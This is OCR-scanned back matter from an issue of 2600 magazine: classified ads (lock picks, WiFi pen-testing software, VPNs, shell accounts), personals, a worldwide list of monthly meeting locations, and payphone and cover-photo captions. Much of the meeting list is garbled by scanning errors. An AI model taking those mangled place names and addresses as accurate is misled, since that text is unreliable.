$53.99 per 18 pack of half liter bottles plus shipping. Write to 
contact@club-mate.us or order directly from store.2600.com. 
HACKERSTICKERS.COM now carries cDe merchandise, 
sells lock pick sets, Bawls energy mints, and an awesome 
lineup of hacker clothing including the new Johnny Cupcakes x 
HackerStickers collaboration Hacker Big Kid Shirt. Get all the 
goods at HackerStickers.com. 

GUIDEBOOK TO COMPUTER AND SMARTPHONE 
SECURITY by Brandon of Lipani Technologies LLC has 
been released. This new security book can be purchased at 
https://leanpub.com/techgeek. Brandon is a certified CompTIA 
Security+ professional helping users and companies secure their 
computers, networks, and smartphones across the country. He 
says, “The purpose of this book is to educate and teach computer 
and smartphone users about safety and ry online.” 
HEATHKIT BOOK: Interested in vintage electronics? 
Classic Heathkit Electronic Test Equipment by Jeff Tranter 
covers Heathkit’s test equipment line, with in depth coverage 
of different models including oscilloscopes, meters, tube testers, 
etc., as well as a history of Heathkit and resources for collecting 
and restoration. 140 pages in 11 chapters plus appendices. 
Retails for $19.95 from lulu.com and amazon.com. 

OPEN SOURCE HARDWARE: crowdfunded and in-stock on 
Crowd Supply (crowdsupply.com). Includes software-defined 
radios (SDRs), DIY computers, NASs, FPGA boards, open 
silicon (RISC-V), hardware encryption/security devices, kite- 
balloons, workbench tools, optical decoders, and opportunities 
to help fight the DMCA (see bunnie huang’s NeTV2 project). 
SECUREMAC,.COM is offering popular anti-malware 
app MacScan 3 to help protect Mac users from malware, 
spyware, and ransomware. Download a 30-day trial directly 
from SecureMac.com, Looking for a new podcast? Check out 
The Checklist by SecureMac on iTunes, Pandora, and Spotify. 
PORTABLE PENETRATOR. WiFi Pen Testing software. 
Find WPA, WPA2, WPS, WiFi Keys. Vulnerability Scanning 
& Assessment Customize reports to use for consulting. Coupon 
code 20% off: 2600. https://shop.secpoint.com 

SAN ANTONIO RADIO MEMORIES - LET ‘EM OUT! 
Remembering San Antonio Radio (and technology) in the 
40s, 50s, 60s, and 70s. Profits go to ARRL. Visit www. 
velocepress.com/books/arts/sarm.php to order today! 


Help Wanted 

JOIN THE HTTPS://CODEFOR.CASH community and earn 
money with freelance programming jobs. All hats welcome! 
PERSONAL ASSISTANT. I need someone to go online for 
me because I’m incarcerated and have no Internet access so 
I’m looking to hire a personal assistant. Pay: As agreed per 
project about 1-5 hours per month, you choose your hours. 
Duties: Internet research, Internet shopping, sending e-mail, etc. 
Must Have: Own phone, Internet access, computer and printer. 
Experience: No experience necessary but the following skills 
and interests are helpful. Self-motivated, the ability to follow 
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instructions, and an attention to details. Computer and Internet 
skills. With an interest in the rehabilitation of criminals and the 
mentally ill, helping others, fundraising, and advertisement. 
Please mail me your name, contact address, and phone 
number, along with reason I should pick you. Eugene Banks, 
1111 Highway 73. Moose Lake, MN 55767-9452 


Announcements 

OFF THE HOOK is the weekly one hour hacker radio show 
presented Wednesday nights at 7:00 pm ET on WBAI 99.5 
FM in New York City. You can also tune in over the net at 
www.2600.com/offthehook. Archives of all shows dating back 
to 1988 can be found at the 2600 site in mp3 format! Your 
feedback on the program is always welcome at oth@2600.com. 
COVERTACTIONS.COM is the most comprehensive 
directory of encryption products anywhere. Search by type, 
hardware/software, country, open source, platform, and more. 
Now over 1036 products listed which include 221 VPN’s, 192 
messaging and 117 file encryption apps. These are just a few of 
the 28 categories available. There is no faster and easier way 
to find the encryption product that meets your requirements. 
Suggestions and feedback welcome. Now featuring news on 
important encryption issues. 

DON’T JUST CELEBRATE TECHNOLOGY, question its 
broad-reaching effects. 78 Reasonable Questions to Ask About 
Any Technology - tinyurl.com/questiontech 


Services 

HAVE YOU SEEN THE 2600 STORE? Plenty of features, 
hacker stuff, and all sorts of possibilities. We accept Bitcoin 
and Google Wallet, along with the usual credit cards and 
PayPal. EVERY YEAR of 2600 and EVERY HOPE TALK now 
available for digital download! Plus, we've lowered prices on 
much of our stock. Won’t you pay us a visit? store.2600.com 
UNIX SHELL ACCOUNTS WITH MORE VHOSTS. If 
you like funny, relevant vhosts for IRC, get a JEAH shell. You 
can also use vhost domains for email. Access new and classic 
*nix programs, compilers, and languages. JEAH.NET hosts 
bouncers, bots, IRCD, and websites. 2600 readers get free setup! 
BTW: Domains from FYNE.COM come with free DNS hosting 
and WHOIS privacy for $5. 

DIGITAL FORENSICS FOR THE DEFENSE! Sensei 
Enterprises believes in the Constitutional right to a zealous 
defense, and backs up that belief by providing the highest 
quality digital forensics and electronic evidence support for 
criminal defense attorneys. Sensei’s digital forensic examiners 
hold the prestigious CISSP, CCE, CEH, and EnCE certifications, 
Our veteran experts are cool under fire in a courtroom - and their 
forensic skills are impeccable. We recover data nationwide from 
many sources, including computers, external media, tablets, 
and smartphones. We handle a wide range of cases, including 
hacking, child pornography possession/distribution, solicitation 
of minors, theft of proprietary data, data breaches, interception 
of electronic communications, identity theft, rape, murder, 
embezzlement, wire fraud, racketeering, espionage, cyber 
harassment, cyber abuse, terrorism, and more. Our principals 
are co-authors of Locked Down: Practical Information 
Security for Lawyers, 2nd edition (American Bar Association 
2016), Encryption Made Simple for Lawyers (American Bar 
Association 2015), and hundreds of articles on digital forensics 
and an award-winning blog on electronic evidence. They lecture 
throughout North America and have been interviewed by 
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‘ABC, NBC, CBS, CNN, Reuters, many newspapers, and even 
Oprah Winfrey’s O magazine. For more information, call us at 
703.359.0700 or email us at sensei@senseient.com. 

GET YOUR HAM RADIO LICENSE! KB6NU's “No 
Nonsense” study guides make it easy to get your Technician 
Class amateur radio license or upgrade to General Class or Extra 
Class. They clearly and succinctly explain the concepts, while 
at the same time give you the answers to all of the questions on 
the test. The PDF version of the Technician Class study guide 
is free, but there is a small charge for the other versions. All of 
the e-book versions are available from www.kb6nu.com/study- 
guides/, Paperback versions are available from Amazon. E-mail 
cewgeek @kb6nu.com for more information. 
DOUBLEHOP.ME is an edgy VPN startup aiming to 
rock the boat with double VPN hops and encrypted multi- 
datacenter interconnects. We enable clients to VPN to country 
A, and transparently exit country B. Increase your privacy 
with multiple legal jurisdictions and leave your traditional 
VPN behind! We don’t keep logs, so there’s no way for 
us to cooperate with LEOs, even if we felt compelled to. 
We accept Bitcoin and offer automated order processing! 
Use promo code COSBYSWEATER2600 for 50% off 
(https://www.doublehop.me). 

INTELLIGENT HACKERS UNIX SHELL: Reverse.Net is 
owned and operated by Intelligent Hackers. We believe every 
user has the right to online security and privacy. In today’s 
hostile anti-hacker atmosphere, intelligent hackers require the 
need for a secure place to work, compile, and explore without 
big-brother looking over their shoulder. Hosted in Chicago 
with Filtered DoS Protection. Multiple Dual Core FreeBSD 
servers. Affordable pricing from $5/month, with a money back 
guarantee. Lifetime 26% discount for 2600 readers. Coupon 
Code: 2600. http://www.reverse.net/ 

ANTIQUE COMPUTERS. From Altos to Zorba and 
everything in between - Apple, Commodore, DEC, IBM, 
MITS, Xerox... vintagecomputer.net is full of classic computer 
hardware restoration information, links, tons of photos, video, 
document scans, and how-to articles. A place for preserving 
historical computers, maintaining working machines, running 
a library of hard-to-find documentation, magazines, SIG 
materials, BBS disks, manuals, and brochures from the 1950s 
through the early WWW era. http://www.vintagecomputer.net 
SKEPTICAL OF GITHUB? sr.ht is an in-progress software 
suite for hosting open source projects that’s more in tune with 
the hacker way. sr-ht is more modular and more flexible, with 
features like mailing list driven development and full virt build 
automation with KVM. Interested in helping test the beta? 
Reach out to SirCmpwn: sir@cmpwn.com 

SQUIDIX provides serious discounts for fantastic web hosting 
for 2600 readers. We love our clients and they love us. Our 2600 
promotion will give you a Super Squid hosting platform for 
only $26.00 for the first year, then only $9.95 per month when 
paid annually. Sign up today and get free domain or domain 
renewal. This offer valid for any new accounts in 2018 and 
includes a free CPanel transfer of one existing site. Sign up at 
www.squidix.com 

LOCKPICKING101.COM - a locksport community driven 
by lock picking hobbyists and locksmiths alike. New to lock 
picking or want to advance your skills or help others learn? Just 
head over to LockPicking101.com and say Mr. Picks sent you! 
ASPIRING TO BE THE MOST ETHICAL TECH SHOP 
IN THE WORLD, Technoethical.com offers the largest catalog 
of hardware products certified by the Free Software Foundation 
(FSF) to Respect Your Freedom (RYF) [fsf.org/resources/hw/ 
endorsement/technoethical]. As a user of Technoethical devices, 
you have the maximum control over your computing, being able 
to use, copy, modify, and distribute all the bits in the operating 
system and, when possible, even at lower levels, such as the boot 
firmware. The shop sells laptops and servers pre-installed with 
a fully free (as in freedom) BIOS replacement and GNU/Linux- 
libre distributions verified and endorsed by the FSF. All x86_64 
devices serviced and sold have Intel's intentional backdoor, 
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the Management Engine [u.fsf.org/2g0], completely removed. 
As the only shop that sells phones with Replicant [replicant. 
us] pre-installed, you can be the first hacker on your block to 
own an Android-based device with an operating system that 
can be compiled completely from source with no proprietary 
blobs. You can also buy from Technoethical a diverse array of 
WiFi adapters that work with drivers and firmware that are fully 
hackable and operate also in the Access Point mode. Moreover, 
Technoethical provides installation/liberation services for all 
computers that are also sold as products. You can ship your 
compatible computer to Technoethical, or ask the team to 
organize a workshop in your local hackerspace or free software 
event. With 4 years of experience on the market, Technoethical 
is operated by a geographically distributed team of hackers 
from North America, the European Union, Russia, and Australia 
that closely follow the software freedom principles of the 
GNU project. Use the coupon code 2600MAG to receive a 
5% discount on all Technoethical products. Order today and 
join Richard Stallman among the many happy customers of 
Technoethical! 


Personals 

1 AM A 36-YEAR-OLD FREE SOFTWARE ACTIVIST, 
interested in all aspects of copyright, trademark, and patent 
law. Looking to meet similar minded women, 26-43 in the 
greater-Seattle area. My interests are GNU/Linux, social justice, 
Mexican food, ghouls, model trains, and video games. Just a 
Crash looking for my Burn. I have strong opinions about obscure 
media formats. I like drinking, cooking, doodling, and wildlife. 
Let’s hit the clubs, make each other laugh. I like a laugh, chat, bit 
of a debate, an argument. I like life. Goldentee@gnu.org 

I AM A WOMAN INCARCERATED IN FEDERAL 
PRISON. I’m hoping to find an intelligent, curious penpal 
with hacker mentality. I will be released sometime around the 
holidays this year. While I am here, I do a lot of reading. I’m 
finishing a vet assisting correspondence course, studying more 
about Linux, and trying to remain healthy in an unhealthy 
environment. Besides 2600, | read SciAm, cyberpunk, history, 
animal welfare, behavior and psychology, law and politics - 
especially computer-related. My interests are far ranging and 
diverse. I have many passions from outdoor fun to Internet 
freedom, whistleblower, transparency and privacy causes. | AM 
opinionated (for example, if you do not support WikiLeaks, 
don’t bother writing), yet also funny, idealistic, and caring. I 
love to learn and think, and there is not a lot of that available 
here. I’m considered white collar crime for providing dark web 
info and anti-facial recognition tools to others. So please write (I 
can also email if you send your email handle) and tell me what 
you're about and what’s going on in your world. I like science, 
politics, everything tech - but most of all, a person willing to 
take time to be an LED in this often dim and dark world. Stacia 
Quarto, 92274051 Unit 2 South, FMC Carswell, PO Box 27137, 
Ft. Worth, TX 76127. 


ONLY SUBSCRIBERS CAN ADVERTISE IN 2600! Don’t 
even think about trying to take out an ad unless you subscribe! 
All ads are free and there is no amount of money we will accept 
for a non-subscriber ad. We hope that’s clear. Of course, we 
reserve the right to pass judgment on your ad and not print it if 
it’s amazingly stupid or has nothing at all to do with the hacker 
world. We make no guarantee as to the honesty, righteousness, 
sanity, etc. of the people advertising here. Contact them at your 
peril. All submissions are for ONE ISSUE ONLY! If you want 
to run your ad more than once you must resubmit it each time. 
Don’t expect us to run more than one ad for you in a single issue 
either. Include your address label/envelope or a photocopy so 
we know you’re a subscriber. If you’re an electronic subscriber, 
please send us a copy of your subscription receipt. Send your 
ad to 2600 Marketplace, PO Box 99, Middle Island, NY 11953 
You can also email your ads to marketplace@2600.com. 


Deadline for Winter issue: 11/21/19. 
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We Did IT! 


It took many years and lots of caffeine, 
but we ’ve finally finished two major digitizing projects. 


Every full volume of The Hacker Digest has now been digitized into 

PDF format. Each digest is comprised of that year’s issues of 2600. 

That means you can now get every single year of 2600 going back to 

1984. If you’re the kind of person who wants it all, then this may be 
just what you’ve been waiting for. 


For $260 you can get EVERY YEAR from the beginning and EVERY 

YEAR into the future - all completely copyable and able to be viewed 

on multiple devices. You'll be amazed at how much hacker material 
will be at your fingertips. 


AND THAT’S NOT ALL! 


y single recorded talk from all of our conferences is now available 
on flash drives or downloadable from our store - all DRM-free so you 
can make as many copies as you want. They’re completely uncut, 

have no annoying YouTube ads, are in the highest quality, 


and can be played virtually everywhere. 


Want a collection of ALL of the talks from every single HOPE conference? 
For $249, you’ll get a bunch of 128gb flash drives chock full of talks from 


all 12 of our conferences, along with helpful navigation and descriptions. 


For more details on these and other awesome deals, visit store.2600.com. 


ANNOUNCING BIHE B26 00 
TOTE BBAG' 


$7.99 each, 
4 for $29.99 plus shipping 


Find this and all kinds of other fun 
hacker stuff at store.2600.com 
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ARGENTINA 
Buenos Aires: Bellagamba Bodegon, 
Armenia 1242, Ist table.to the leftof the 
front Jae 
Catamarea Rincon Universitario, AV: 
Belgrano 41 Ist fidor. Pip 
Paranag Orig hove Bar ervantes 
384. 8 pm 
‘Saaveda: Pizagfia La Bingola de Sad¥geira. 
Av. Catt 4499, Capital Pederal"? prt 
AUSTRALIA 
Central Coast: Central Coast L 
Club (ground floor, outdoor area). 6 
Melbourne: The Charles Dickens 
Block Arcade, 290 Collins St. 
Sydney: Metropolitan Hotel, | Bridg 
St. 6 pm 


AUSTRIA 
Vienna; RIAT - Institute for Future 
Cryptoeconomics, Neubaugasse 64-66/3/4 
BELGIUM 
Antwerp: Central Station, top of the stairs 
in the main hall. 7 pm 
BRAZIL 
Belo Horizonte: Pelego’s Bar at Assufeng 
near the payphone. 6 pm 
CANADA. 
Alberta 
Calgary: Food court of Eau Claire 
Market. 6 pr 
Edmonton: Elep 
(0314 Whyte Ave. 
box. 6 pm 


ant & Castle Pub, 
big red telephone 


British Columbia 
Kamloops: Student St in Old Main in 
of Tim Horton's, TRU ca 
Vanec 
food court 


wver: Intemational Vill 


Manitoba 
Winnipeg: St. Vita 
court by HMV 
New Brunswick 
Moncton: Champlain Mall food court, 
near KFC. 7 pm 
Newfoundland 
St. John’s: Memorial University Center 
f the Dairy Queen). 
Ontario 
Ottawa: World Exchange Plaza, 111 
Albert St, 2nd floor. 6:30 pm 
Toronto: Free Times Cafe, Coll 
Spadina 
Windsor: Sandy's, 7120 Wyandotte 
St E. 6 pm 


shopping center, food 


food court (in fre 


CHINA 
Hong Kong: Frites Quarry Bay, G/F 
Oxtord House. 

COSTA RICA 
Heredia: Food court, P: 
Flores Mall 


de las 


CZECHIA 

Prague: Legenda pub. 6 pm 
DENMARK 

Fast Eddie’s poo! hall 

the DSB cafe 


Aalbor} 
Aarh 
in the railway station 
Copenhagen: Cate Blasen. 
Sonderborg: Cafe Druen. 7:30 pm 
FINLAND 
Helsinki: Forum shopping center 
Mannerbeimintie 20), food court on 


In the far comer 


floor zerv 
FRAN 
Paris: Burger King, Ist floor, Place de la 
Republique. 6 pm 
GERMANY 
Alexa shopping mall 


\derplatz) in front of Manju. 7 pm 

GREECE 
Athens: Outside the bookstore 
Papasotiriou on the corner of Patision and 
Stoumnari.7 pm 

IRELAND 

Dublin: At the entrance to the Dublin 
Tourism Inf 


St 


ion Centre on Suffolk 


ISRAEL. 
*Beit Shemesh: In the big Fashion Mall 
(across from train station), 2nd floo 
court. Phone: 1-800-800-515, 7 pm 
*Safed: Courtyard of Ashkenazi Ari, 
ITALY 

Milan: Piazza Loreto in front of 
McDonalds. 


JAPAN 
Kagoshima: Amu Plaza next to the central 
railway station in the ba it food court 


Food Cube) near Doutor Coffee 

Tokyo: Mixing Bar near Shinjuku Station. 

2 blocks east of east exit, 6:30 pm 
KAZAKHSTAN 

Astana: CheckPoint Brasserie 

Koshkarbayeva St 34. 8 pm 
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MEXICO 
‘Chetumal: Food court at La Plaza de 
Americas, tight froot near Italian food, 
Mexico Cityg? Zocalo” Subway Stata 
(Line 2 of th@®METRO" subway, the filbe 
he! c HDepartautento det Distritg 
al” exifgpear the'payphones and! 

the candy shop. at of the 

Zabalo-PingSuare2™ tyghel 

NETHEREANDS 

Utrecht: In front of the Burger King at 

Utrecht Central Station. 7 pm 
NORWAY 


Station at the “meeting 


Oste 

point” area in the main hall, 7 pm 

Tromsoe: The upper floor at Blaa Rock 

Cafe, Strandgata 14.6 p 

‘Trondheim: Den Gode Nabo, 7 pm 
PERU 

Lima: Barbilonia (ex Apu Bar), en 

Alcanfores 455, Miraflores, at the end of 

Tarata St. 8 pm 

Trujillo: Starbucks, Mall Aventura 

Plaza. 6 pm 


HILIPPINES 
Quezon City: Chocolate Kiss ground 
floor, Bahay ng Alumni, University of the 
Philippines Diliman. 4 pm 
POLAND 

Krakow: VRCafe (upstairs), Dolnych 
Mlynow 10.8 pm 

PORTUGAL 
Lisbon: Amoreiras Shopping, food court 


next to Portugalia. 7 
RUSSIA 

Moscow: RNDM, Nastavnicheskiy 

Pereulok, 13-15 Building 3. 7 pm 


Murmansk: Freshg: 
8.7 pm 
Petrozavodsk: “Good Place’ 
Pervomayskiy, 2. 7 
Saint Petersburg: Krasnosdonskaya 
Ulitsa, 4.7 pm 
SWEDEN 
Stockholm: Starbucks at Stockholm 
Central Station 
SWITZERLAND 
Lausanne: In front of the MacDo beside 
the train station. 7 p 
THAILAND 
Bangkok: The Connection Semi 
Center. 6:30 pm 
UNITED KINGDOM 
England 
Leeds: ‘The Brewery Tap Leeds. 7 pm 
\don: Trocadero shopping center 
Circus), front entrance on 


me, Rybnyy Proyezd, 


anti-cafe, pr. 
pm 


try St. 6:30 pm 
Manchester: Bulls Head Pub on London 
Rd. 7:30 pm 

Norwich: Coach and Horses on Thorpe 
Rd.6 pm 


Scotland 
Edinburgh: Nobles Bar in Leith. 6 pm 
Glasgow: Bon Accord Pub, 153 North 
St.6 pm 

Wales 
f: Rummer Tavern opposite Ca 


Castle. 
Ewloe: St. David's He 
UNITED STATES, 
Alabama 


Auburn: The student lounge upstairs in 
the Foy Union Building. 7 pm 

Arizon 
Phoenix: Changing Hands Bookstore, 300 
W Camelback Rd. 6 pm 
Prescott: Method Coffee, 3180 Willow 
Creek Rd. 6 pm 
Tucson: Barnes & Noble cafe, 5130 E 
Broadway Blvd 

Arkansas 
Fort Smith: Fort Smith Coffee Company 
1101 Rogers Ave. 6 pn 

California 
Anaheim (Fullerton): 23b Shop, 418 
E Commonwealth Ave (behind Pizza 


Hut). 7 pm 
: Idea Fab Labs. 7 pm 
¢ Union Station, 
entrance (Alameda St side) near the Traxx 
Bar. 6 pm 
Montere 
5:30 pm 
Petaluma: Starbucks, 125 Petaluma 
Blvd N. 6 pm 
San Diego: Regents Pizza, 4150 Re 
Park Row #170 
San Francisco: 4 Embarcadero Center 
near street level fountains. 6 pm 
San Jose: Outside the ca 
Library at 4th and E San F 
Colorado 
Denver (Lone Tree): Park Meadows 
Food Court. 


East Village Coffee Lounge, 


Fort Collins: Dazbog Coffee, 2733 
Council Tree Ave. 7 
Delaware 

Mewark: Baines & Noblecafe areal 
Christiand/Mall. 

Florida 
Fort Lauderdale: Grit! Col¥@@erdject. 
599 SW Bid Ave. 7 pr 
Gainesvilit In the badk of the University 
of Flortd*€ Reitz UntOth'tood court. 6 pm 
Jacksonville: Kickbacks Gastropub, 910. 
King St. 6:30 pm 
Melbourne: Sun Shoppe Cafe, 540 E New 
Haven Ave. 5:30 pm 
Sebri Lakeshore Mall food court, next 
to payphones. 6 pm 
Tampa: it Barnes & Nob! 
Dale Mabry Hwy 
Titusville: Crescent Coffee Company, 311 
S Washington A\ 


213N 


Georgia 
Atlanta: Lenox Mall food court. 7 pm 
Hawaii 
Hilo: Prince Kuhio Plaza food court, 111 
East Puainako St 
Idaho 
Boise: BSU Student U 
upstairs from the main 
Illinois 
‘Champaign-Urbana: Lincoln Sq 
Mall food court 
Chicago: O'Hare Oasis on 294 behind the 
bank kiosk, 8 pm. 
Peoria: Starbucks, 1200 West Main St 
Indiana 
Bloomington: College Mall food court 
2804 E 3rd St 
jansyille: Barnes & Noble cafe at 624 S 
Green River Rd. 
Indianapolis: The Tomlinson Tap f 
in City Market 
West Lafayette: Jake's Roadhouse, 135 S 
Chauncey Ave 


ion Building 
ance 


Towa 

Ames: Memorial Union Building food 

court at the lowa State University 

Davenport: Co-Lab, 627 W 2nd St 
Kansas 

Kansas City (Overland Park): Barnes & 

Noble cafe, Oak Park Mall. 

Wichita: Riverside Perk, 1144 Bitting 

Ave 


Louisiana 
New Orleans: Z’otz Coffee House 
yptown, 8210 Oak St. 6 pm 
Maine 
Portland: Maine Mall by the bench at the 
food court door. 6 pm 
Maryland 
Baltimore: Barnes & Noble cafe at the 
Inner Harbor 
Massachusetts 
Boston (Cambridge): Starbucks, 2nd 
floor, Harvard Square, 1380 Massachusetts 
Ave. 7 pm 
Waltham: The Telephone Museum, 289 
Moody St 


Michigan 
Ann Arbor: Starbucks in The Galleria on 
S University. 7 pm 


Minneso 
Bloomington: Mall of Anv 
in front of Burger King. 6 pm 
Missouri 
St. Louis: Arch Reactor Hacker Space, 
2215 Scott Ave. 6 pm 
Montana 
Helena: Hall beside OX at Lundy Center 
Nebraska 
Omaha: Westroads Mall food court near 
south entrance, 100th and Dodge. 7 pm 
Ne 
Elko: Uber Games an 
Idaho St. 6 pm 
Las Vegas (Henderson): SYN Shop, 1075 
American Pacific Dr Suite C. 6 pm 
Reno: Bares & Noble Starbucks 5555 
S. Virginia St 
New Hampshire 
focal Burger, 82 Main St. 7 pm 
New Jersey 


a food court 


fechnology, 1071 


Keen 


Somerville: Dragonfly Cafe, 14 E Main St. 


New York 

Albany: Starbucks, 1244 Wester 

Ave. 6 pm 

New York: The Atrium at 875, S3rd St & 

3rd Ave, lower leve! 

Rochester: Interlock Rochester, 115 E 

Main St, Door #7, Suite 200. 7 pm 

Syracuse: Secure Network Techn 

247 W Fayette St, 2nd floor 
North Carolina 

Charlotte: Panera Bread, 9321 JW Clay 

Bivd (near UNC Charlotte), 6:30 pm 


Greensboro: Caribou Coffee, 3109 
Northline Ave (Friendly Center). 
Raleigh: Morning Times, 1a Haxgett 
Syghpm 


North Daltety 
Wargo: West Acres Mall fS@iipaurt. 
Ohio 
\Ghocinnati: Hige13. 2939 Spring'€ijove 
AW] pm 


ensville Heigtits): 
Panera Bread, 4103 Richmond Rd. 
‘Columbus: Front of the food court 
fountain in Easton Mall. 7 pm 

Dayton: Marions Piazza ver. 2.0, 8991 
Kingsridge Dr, behind the Dayton Mall 


off SR-741 
Toledo: SIP Coffee, Cricket West shoppi 


‘enter, 2nd floor, 
Youngstown (Nile 
Youngstown Warren Rd 

Oklahoma 
Oklahoma City: Cafe Bella, southeast 


ranara Bread, 5675 


comer of SW 89th St and Penn 
Oregon 
Portland: Theo's, 121 NW Sth Ave 
Pennsylvania 


Allentown: Panera Bread, 3100 W 
Tilghman St. 6 pm 
nera Bread, 4263 Union 


side Taco Bell. 6 pm 
Pittsburgh: Tazz D'Oro, 1125 North 
Highland Ave at round table by front 
window 
State College: Big Bow! Noodle House 
418 E College Ave 

Puerto Rico 
San Juan: Plaza Las Ameri 
Ist floor. 
Trujillo Alto: The Office Irish Pub. 


7:30 pm 


South Carolina 
SubProto, 3926 Wesley 


Myrtle Bea 
St, Suite 403. 


South Dakota 
mpire Mall, by Burger King 
Tennessee 
Knoxville: West Town Mall food cpurt. 
6pm 
Nashville: Nashville Software School, 301 
Plus Park Blvd #300. 6 pm 
Texas 
Addison: Dunn Brothers Coffee, 3725 
Belt Line Rd 
Austin: Whole Foods mezzanine level 
525 N Lamar Blvd. 7 pm 
Dallas: Wild Turkey, 2470 Walnut Hill 
Ln. 7 pm 
Houston: Ninfa’s Express seating area, 
ia 1V.6 pm 
Plano: Fourteen Eighteen Coffeehouse, 
418 Ave K.6 pm 

Vermont 
Burlington: The Burlington Town Center 
Mall food court undet 

Virgin 
Blacksburg: Squires Student Center at 
Virginia Tech, 118 N. Main St, 7 pm 
Charlottesville: Panera Bread at the 
Barracks Road shopping center. 6:30 pm 
Lexington: Collaboratory, 18 East Nelson 
St, #103. 6 pr 
Reston: Refraction, 11911 Freedom Dr 
8th FI.7 pm 
Richmond: Hack.RVA 1600 Roseneath 
Rd.6 pm 


Sioux Fall 


Washingt 
Seattle: Cafe Allegro, upstairs, 4214 
University Way NE (alley entrance). 6 pm 


jpokane: Starbucks, 4727 N Division 
Tacoma: Tacoma Mall food court. 6 pm 
Wenatchee: Badger Mountain Brewing. 
1 Orondo Ave. 


Wisconsin 
Madison: Fair Trade Coffee House, 418 
State St 


URUGUAY 
Montevideo: MAM Mercado Aj 
20, Choperia 


Montevideo, Jose L.1 
Mastra. 7 pm 


All meetings take place on the first 
Friday of the month (a * indicates a 
meeting that’s held on the first Thursday 
of the month). Unless otherwise noted, 
2600 meetings begin at $ pm local time. 
To start a meeting in your city, send 
email to meetings@2600.com. 


Follow @2600Meetings on Twitter 
and let us know your meeting's 
‘Twitter handle! 


2600 Magazine 


Exotic Payphones 


Sey@helles. Spotted in Beau Vallon and operated 
hy Alittel, one of two cellular providers. Sadly, this 
phofié has been vandalized, is no longer maintair 
wnd doe t work. 


is standard model has been ind since 
the 1980s and was found in Talknafjérdur, a town in 
the northwest of about 250 people. 


Photo by Babu Mengelepouti Photo by Adalsteinn 


Hong Kong. This phone is under cover, which is 
how it’s stayed in such great condition. If you look 
carefully, you'll see that the old “999” emergency 
dialing code is still in use from the British colonial 
day 


Malaysia. Here are a couple of completely differen 
Wid colorful types of payphones living in peace and 
hiifmony by the water, encountered on the island of 
Noman 


Photo by Wreckage Brother Photo by Jon Whitton 


Visit www.2600.com/payphones to see our foreign payphone photos! 
(Or turn to the inside front cover to see more right now.) 


The Back Cover Photos 


There’s quite a story behind this 
sign, discovered by Jon Guidry in 
the Perimeter Mall in Dunwoody, 
Georgia. We all know a 404 error 
means a page on the web isn’t 
able to be found. But this was 

: actually a reference to nearby 
COMPUTER | Atlanta’s area code (which used 
RE PAIR to cover the entire state). Sadly 
- : ag enough though, since this picture 
was taken, this branch has closed - 
meaning it’s not able to be found. 
And so the irony completes. 


We’ ll just say it now. We want 
this banner. We’ll even wear 
all the protective equipment 
it’s telling us to whenever we 
engage in hacking if we can 
just have it to proudly hang 
somewhere. This was found 

| by Wreckage Brother at 
the Pasar Seni MRT station 
in Kuala Lumpur, Malayent , HACKING ACTIVITY 
We suspect this wasn’t in MANDATORY PERSONAL PROTECTIVE EQUIPMENT (P 
fact some sort of crude pen (UST BEWORN AT ALL TIME 
testing operation, but rather a ! - 
drilling/construction project. 


If you’ve spotted something that has “2600” in it or anything else of interest to the hacker 
world (such as funny uses of “hacker,” “unix,” “404,” you get the idea...), take a picture and 
send it on in! Be sure to use the highest quality settings on your camera to increase the odds 
of it getting printed. Make sure and tell us where you spotted your subject along with any 
other info that makes it interesting - many photos are eliminated due to lack of detail. 


Email your submissions to articles@2600.com or use snail mail to 
2600 Editorial Dept., PO Box 99, Middle Island, NY 11953 USA. 


If we use your picture, you’ ll get a free one-year subscription 
(or back issues) and a 2600 t-shirt of your choice. 


